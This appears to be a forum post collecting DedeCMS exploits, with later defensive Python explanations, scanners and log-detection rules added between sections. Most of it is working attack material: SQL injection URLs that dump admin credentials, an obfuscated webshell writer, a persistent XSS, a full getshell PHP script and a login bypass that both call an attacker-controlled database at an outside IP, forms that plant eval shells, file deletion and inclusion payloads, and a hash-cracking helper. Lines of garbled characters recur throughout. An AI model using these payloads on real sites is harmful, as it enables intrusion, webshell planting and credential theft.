
DedeCMS vulnerability roundup

Posted 2012-10-18 10:42:14

DedeCMS 5.6 rss.php SQL injection
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCMS v5.6 embedded malicious code execution
Register a member account and create a "software" upload; put the following in the local address field:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it. With this variant instead:
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
it writes x.php, a one-line webshell with password xiao (the two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu).

DedeCMS 5.6 GBK SQL injection

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
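The mechanism behind a GBK injection, and behind the %cf' prefix in the infosearch.php payload at the end of this post, is that a single-byte escaper puts a backslash (0x5C) after a byte that GBK treats as the first half of a two-byte character, so the backslash is swallowed and the quote survives. This is an added example and not code from the post or from DedeCMS: the post does not show the vulnerable query code, so the escape-then-concatenate pattern is modelled in Python, and the inputs are constructed.

```python
"""Wide-byte (GBK) injection: why addslashes() is not enough when the
database connection uses a multibyte legacy charset. Added example; the
query text and inputs are constructed, not taken from DedeCMS."""


def addslashes(raw: bytes) -> bytes:
    """Byte-wise model of PHP addslashes(): a backslash before ' " \\ and NUL,
    with no idea which bytes belong to a multibyte character."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(uid: bytes) -> bytes:
    """The vulnerable pattern: escape, then splice the raw bytes into SQL."""
    return b"SELECT * FROM dede_member WHERE userid='" + addslashes(uid) + b"'"


def unescaped_quotes(sql: bytes) -> int:
    """Count the quote characters MySQL sees after decoding the statement as
    GBK (the connection charset of the affected sites). A well-formed
    statement from build_query() has exactly two."""
    count, after_backslash = 0, False
    for ch in sql.decode("gbk", errors="replace"):
        if ch == "'" and not after_backslash:
            count += 1
        after_backslash = ch == "\\"
    return count


def is_broken_out(uid: bytes) -> bool:
    """True when the escaped input still terminates the string literal."""
    return unescaped_quotes(build_query(uid)) != 2


def escape_gbk_aware(raw: bytes) -> bytes:
    """Hardened form: decode as GBK first (a dangling lead byte such as 0xBF
    followed by a quote is not valid GBK and is rejected), escape at the
    character level, then re-encode. Parameterised queries avoid the whole
    problem; this is the minimum fix for code that must keep concatenating."""
    text = raw.decode("gbk")  # raises UnicodeDecodeError on b"\xbf'"
    text = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return text.encode("gbk")


def rejected_by_hardened_escape(raw: bytes) -> bool:
    try:
        escape_gbk_aware(raw)
        return False
    except UnicodeDecodeError:
        return True
```

Plain ASCII and complete GBK characters (such as the 涛声依旧 string in the payloads) escape correctly either way; only an input ending in a lone lead byte followed by the quote breaks out, which is exactly what 0xBF' and 0xCF' supply.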

DedeCMS (all versions) gotopage XSS
1. Open the URL below in the browser; it triggers the XSS and installs the "XSS rootkit". Note that IE8/9 block URL-based XSS, so their XSS filter has to be switched off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From now on any visit to either of the URLs below, whatever the gotopage value, triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DedeCMS variable override getshell
#!/usr/bin/php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// The {dede:php} body stored in the attacker-controlled dede_mytag row echoes "OK"
// once it has written the shell file, so look for that in the response body.
// (Checking the raw response would match the "200 OK" status line instead.)
if (strpos($exp,"OK")!==false){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname point at a MySQL server the attacker
// controls that holds the prepared dede_mytag row (see the tag remote file write
// section below); the file name written is whatever that row's {dede:php} body
// chooses. Replace these values with your own server before use.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: close\r\n"; // close, so feof() is reached and the whole reply is read
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
exit;
}
fwrite($ock,$data);
$resp="";
while (!feof($ock)) {
$resp.=fgets($ock, 1024);
}
fclose($ock);
// strip the headers so the status line cannot count as success
$p=strpos($resp,"\r\n\r\n");
return ($p===false) ? $resp : substr($resp,$p+4);
}
?>

, q" T, y1 a8 q; u$ M- T, G2 D0 j# P& H" p; @, R8 p1 c
' ?/ }- N! x) d4 T1 A

: e* S% U  w3 k4 Y' q
9 Z- L$ W% O1 Z) D+ O6 s+ N- p+ Q! Q  c. x) @, U

. |2 ^& L: P) [
9 ^$ i# l: D/ G1 }
) t- n( r* w2 |1 C) {1 b4 j' c
DedeCMS v5.6-5.7 unauthorised access (straight into the backend)

http://www.ssvdb.com/<backend-dir>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug with the current captcha value and you are logged into the backend. The cfg_db* overrides point the login at a MySQL server the attacker controls, so userid and pwd are checked against that database instead of the site's own.

Prerequisite: you must already know the backend path.
! N" A& u3 f( [; D3 f, L/ C4 X; T  d& ?

: b# n/ o( M+ I& X1 v; n' m
6 `2 h! }; x1 y% Z2 H8 y) ^8 m' [6 p7 b5 w

$ F/ x0 D) _+ `. m6 h* a
+ [6 t- Z9 S6 h( Y9 U! Y7 c7 e, r5 r

8 Q3 k- U1 J! X6 N
+ A7 M8 w- z1 y, I' [* N1 \2 ?) E; D: d/ N' k( P
DedeCMS tag remote file write
Prerequisite: set up your own DedeCMS database and insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit the form below; the shell appears as 1.php in the same directory. The mechanism is left for you to work out...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// point the form at the doaction URL (the target's mytag_js.php) before submitting
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
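What the PHP script, the login.php bypass and the form above all exploit is the way older DedeCMS registers request variables. The block below is an added example and not DedeCMS code: a Python dict stands in for PHP's global symbol table, and the two checks are reconstructions of a shallow top-level-key filter (the kind the nested field name slips past) and of the recursive filter later releases apply; verify the exact regex against your own copy of include/common.inc.php.

```python
"""Model of DedeCMS request-variable registration and why a POST field named
_COOKIE[GLOBALS][cfg_dbhost] overwrites $cfg_dbhost. Added example; the
checks are reconstructions, not DedeCMS source."""

import re


class RequestRejected(Exception):
    """Stands in for exit('Request var not allow!')."""


def register_request_vars(symbols):
    """Model of:
         foreach(array('_GET','_POST','_COOKIE') as $r)
             foreach($$r as $k => $v) ${$k} = $v;
    Two PHP facts drive the exploit: ${'_COOKIE'} = ... replaces the real
    $_COOKIE array before the loop reaches it, and ${'GLOBALS'} = array(...)
    writes straight into the global symbol table."""
    for source in ("_GET", "_POST", "_COOKIE"):
        for key, value in list(symbols.get(source, {}).items()):
            if key == "GLOBALS" and isinstance(value, dict):
                symbols.update(value)  # cfg_dbhost and friends overwritten here
            else:
                symbols[key] = value
    return symbols


SHALLOW = re.compile(r"^(cfg_|GLOBALS)")
DEEP = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def shallow_check(symbols):
    """Inspects only the top-level keys of each request array (assumed form
    of the old check; it never sees the nested GLOBALS key)."""
    for source in ("_GET", "_POST", "_COOKIE"):
        for key in symbols.get(source, {}):
            if SHALLOW.match(key):
                raise RequestRejected(key)


def deep_check(symbols):
    """Recurses into nested arrays and also refuses keys that would replace
    one of the request arrays themselves (assumed form of the later fix)."""
    def walk(key, value):
        if DEEP.match(str(key)):
            raise RequestRejected(key)
        if isinstance(value, dict):
            for k, v in value.items():
                walk(k, v)
    for source in ("_GET", "_POST", "_COOKIE"):
        for key, value in symbols.get(source, {}).items():
            walk(key, value)


def run_request(post=None, get=None, cookie=None, check=None):
    """Load config, apply the chosen check, then register request variables.
    Returns the resulting globals, or None when the request was rejected."""
    symbols = {
        "cfg_dbhost": "localhost", "cfg_dbuser": "dede", "cfg_dbprefix": "dede_",
        "_GET": get or {}, "_POST": post or {}, "_COOKIE": cookie or {},
    }
    try:
        if check:
            check(symbols)
        return register_request_vars(symbols)
    except RequestRejected:
        return None


# The field names from the post, as the nested arrays PHP parses a[b][c]=v into.
# db.attacker.example stands in for the attacker-controlled database host.
MYTAG_POST = {
    "doaction": "http://www.test.com/plus/mytag_js.php?aid=1",
    "_COOKIE": {"GLOBALS": {"cfg_dbhost": "db.attacker.example",
                            "cfg_dbuser": "exploit", "cfg_dbpwd": "90sec",
                            "cfg_dbname": "exploit", "cfg_dbprefix": "dede_"}},
    "nocache": "true",
}
LOGIN_GET = {
    "dopost": "login", "validate": "dcug", "userid": "admin", "pwd": "inimda",
    "_POST": {"GLOBALS": {"cfg_dbhost": "db.attacker.example", "cfg_dbuser": "root",
                          "cfg_dbpwd": "r0t0", "cfg_dbname": "root"}},
}
```

With no check or the shallow check, both requests leave cfg_dbhost pointing at the attacker's database; the recursive check rejects them because the first key it walks is _COOKIE or _POST, and a plain GLOBALS[cfg_dbhost] field is caught by either check.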
DedeCMS <= V5.6 Final template execution
1. Register a user, go into the member area, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. Say the image is:
uploads/userup/2/12OMX04-15A.jpg

The template content (prefix it with GIF89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article you just published, view the page source and build a form like this:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(these two fields are the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">Body</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>
Submit. If it reports that the edit succeeded, the template path has been changed.
3. Open the edited article. Assuming its aid is 2, request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written into the plus directory.
DedeCMS Get Shell (5.3/5.6)
GIF89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>

Build the form above; after the upload the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
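Both this section and the template execution section before it leave the same trace on disk: a file under uploads/userup/ with an image extension whose content is a DedeCMS template (with or without a GIF89a prefix). The scanner below is an added example for finding such files on a suspect install, not code from the post or from DedeCMS; the sample tree written by demo() is constructed from the post's two payloads.

```python
"""Scan an uploads tree for images that are really templates or PHP.
Added example; the sample files in demo() are constructed."""

import os
import re
import tempfile

# Markers that have no business inside an image: PHP open tags and DedeCMS
# template tags that ask the engine to run PHP.
TEMPLATE_OR_PHP = re.compile(
    rb"<\?php|<\?=|\{dede:\w+[^}]*runphp\s*=\s*['\"]yes['\"]|\{dede:php\}", re.I)

MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}


def inspect_file(path):
    """Findings for one file: 'magic-mismatch' when the header does not fit
    the extension, 'template-tag' when template or PHP markers are present.
    Only the first 4 MiB are read; that is plenty for both checks."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in MAGIC:
        return []
    with open(path, "rb") as fh:
        data = fh.read(4 * 1024 * 1024)
    findings = []
    if not data.startswith(MAGIC[ext]):
        findings.append("magic-mismatch")
    if TEMPLATE_OR_PHP.search(data):
        findings.append("template-tag")
    return findings


def scan_uploads(root):
    """Walk an uploads directory; map relative path -> findings for suspect files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = inspect_file(full)
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report


def demo():
    """Write a constructed uploads tree mirroring the post's payloads and scan it."""
    root = tempfile.mkdtemp(prefix="dede-uploads-")
    samples = {
        "userup/1/clean.gif": b"GIF89a" + bytes(64),
        # Get Shell section: valid GIF header followed by a runphp tag
        "userup/3/1.gif": b"GIF89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}",
        # template execution section: the image replaced wholesale by a template
        "userup/2/12OMX04-15A.jpg": b"{dede:name runphp='yes'}\n$fp = @fopen(\"1.php\", 'a');\n{/dede:name}",
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return scan_uploads(root)
```

A magic-byte check alone would pass the GIF89a variant, and a tag search alone would miss a replaced image that carries some other payload, so report both signals and review anything that trips either one.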
DedeCMS V5.6 remote file deletion
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
DedeCMS V5.6 plus/carbuyaction.php local file inclusion
http://www.test.com/plus/carbuya ... urn&code=../../
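The deletion above and this inclusion are the same defect: a user-supplied path fragment is joined onto a base directory and used without checking where it ends up. The following is an added example of the containment check that closes both, not DedeCMS code; the post shows only the payloads, so the document root (WEBROOT), the payment include directory (PAYMENT_DIR) and the shape of the two hardened checks are assumptions made for the demonstration.

```python
"""Path containment for a delete (edit_face.php oldface) and an include
(carbuyaction.php code). Added example; directory layout is assumed."""

import os
import re

WEBROOT = "/srv/dedecms"                                     # assumed document root
PAYMENT_DIR = os.path.join(WEBROOT, "include", "payment")    # assumed include dir


def resolve_inside(base_dir, user_path):
    """Join user_path under base_dir and return the resolved path, or None
    when normalisation (.., leading /, symlinks) takes it outside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    return target if os.path.commonpath([base, target]) == base else None


def face_delete_allowed(uid, oldface):
    """edit_face.php builds webroot + oldface and unlinks it. The hardened rule:
    the file must resolve inside the requesting member's own avatar directory,
    so neither ../ nor another member's uid can reach anything else."""
    own_dir = os.path.realpath(os.path.join(WEBROOT, "uploads", "userup", str(uid)))
    target = os.path.realpath(os.path.join(WEBROOT, oldface.lstrip("/\\")))
    return os.path.commonpath([own_dir, target]) == own_dir


def payment_module_allowed(code):
    """A value that ends up in include(): accept an identifier only, and still
    confirm the resulting file name resolves inside PAYMENT_DIR."""
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", code):
        return False
    return resolve_inside(PAYMENT_DIR, code + ".php") is not None
```

The allowlist on code is the real fix for an include; the resolve_inside check is belt and braces, and is the right primitive for cases like the avatar delete where the value legitimately is a path.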
. [, E7 e! `  A7 a) X
; q5 |* S6 I" D% z6 ]% n8 x! h* e# h6 {/ w
0 l! O6 u- ?6 _# Q- P& H7 G9 [
4 D) ~% g8 n; J2 J/ m5 b5 q

* k  X* l# \( J" P/ A4 K& S! T/ W$ e, B

3 [$ g% X0 C; j( T. `9 D" J' p8 m) t
5 ?! s, O2 m% g1 u, F

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(%23@__admin is the placeholder #@__admin, which DedeCMS expands to the configured table prefix, so dede_admin on a default install.)
The stored admin password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving 20; to get the standard 16-character MD5, drop 3 more from the front and 1 from the end.
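The two hash transforms described above, as an added example that is not part of the original post: hashlib stands in for PHP's md5(), and the check values for "admin" come from running the functions, not from the post.

```python
"""DedeCMS admin hash shape: 20 characters cut from the hex MD5, and how to
get back to the 16-character MD5 that password crackers accept. Added example."""

import hashlib


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_admin_hash(password: str) -> str:
    """20-character form held in the admin table: the 32-character MD5 with
    the first 5 and the last 7 characters removed, as the note above says."""
    return md5_hex(password)[5:-7]


def stored_to_md5_16(stored: str) -> str:
    """Drop 3 more from the front and 1 from the end: the standard 16-character
    MD5, i.e. characters 8..23 of the full digest."""
    if len(stored) != 20:
        raise ValueError("expected the 20-character admin hash")
    return stored[3:-1]


def md5_16(password: str) -> str:
    return md5_hex(password)[8:24]


def matches_stored(stored: str, candidate: str) -> bool:
    """Offline check of a candidate password against a dumped admin hash."""
    return stored_to_md5_16(stored) == md5_16(candidate)
```

Because the 20-character value is a substring of the full digest, no extra secret is involved: converting a dump to 16-character MD5 and feeding it to an ordinary cracker is enough, which is why the note bothers to spell out the offsets.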
DedeCMS 5.1 feedback_js.php SQL injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

2 p5 u- U9 s% D1 @7 {8 H. Z) z
3 `; Q% X! D" x7 R5 h+ n* o" T
  k! L1 q5 w. F) c& E2 I, H! z! |, Z& R+ o! o! H& l6 h" {
8 v3 y& t' f& k: e5 B5 L

/ U# B9 n- q- b' a( i( `6 r( x1 d/ Z7 `( V& @

/ @4 G* R: l/ |' A% D1 z
+ D$ z3 K7 l  K' p; J: n5 S( D$ E/ B
DedeCMS select_soft_post.php uninitialised variable
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS 5.3 - 5.5 plus/digg_frame.php injection
It combines a MySQL numeric-parse error on the id value with the fact that DedeCMS records database errors in a PHP file (data/mysql_error_trace.php) whose header is not validated, so PHP code passed in mid ends up inside that file.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form's action is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
<!-- the field name matches eval($_POST[x]) in the injected payload -->
<textarea name="x">var_dump(3);</textarea>
<input type="submit" value="OK" />
</form>

After pressing OK, seeing the step-2 output again means the file trojan is in place.

1 C  m- \8 m( T" x! ]. T: h' R. M! u
2 `: V4 _: e  T, R2 r" k( q8 @
; o; Q$ n2 ~; U/ w) h" [0 b

# g6 H$ X1 ?) h! _& ^5 S  P, C& n! s" D. {+ \5 l
, w5 S& f3 X/ H" W( H$ P
+ e( ^' h; Y  ]& l$ q/ R  C
2 e. x4 U2 R; x& ]8 |+ Q) F
' E, T& M+ P$ j! C  O9 G: I

: Z, @4 P! T' @. @. Z4 ]1 D7 b% q
DedeCMS plus/infosearch.php SQL injection
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
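Every request in this roundup leaves a recognisable shape in the web server access log. The block below is an added example, not part of the original post: detection rules written from the payloads above (variable override, error-based and union injection, the raw sql= parameter, the gotopage XSS, path traversal and hits on the digg_frame error-trace file), run over constructed log lines that use documentation IP ranges rather than a real server's traffic.

```python
"""Flag the request patterns from this post in an Apache-style access log.
Added example; SAMPLE_LOG is constructed, the rules come from the payloads."""

import re
from urllib.parse import unquote_plus

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Matched against the percent-decoded, lower-cased request URL.
RULES = {
    "variable-override": re.compile(r"(_cookie|_post|_get)\[globals\]|globals\[cfg_"),
    "sqli-error-based":  re.compile(r"updatexml\s*\(|extractvalue\s*\("),
    "sqli-union":        re.compile(r"union\s+(all\s+)?select"),
    "sqli-raw-query":    re.compile(r"[?&]sql=\s*(select|insert|update|delete)"),
    "xss-gotopage":      re.compile(r"gotopage=[^&]*<script"),
    "path-traversal":    re.compile(r"\.\./"),
    "error-trace-shell": re.compile(r"/data/mysql_error_trace\.php"),
}


def classify(url):
    """Decode once (payloads arrive percent-encoded) and return the names of
    every rule that matches, in RULES order."""
    decoded = unquote_plus(url).lower()
    return [name for name, rx in RULES.items() if rx.search(decoded)]


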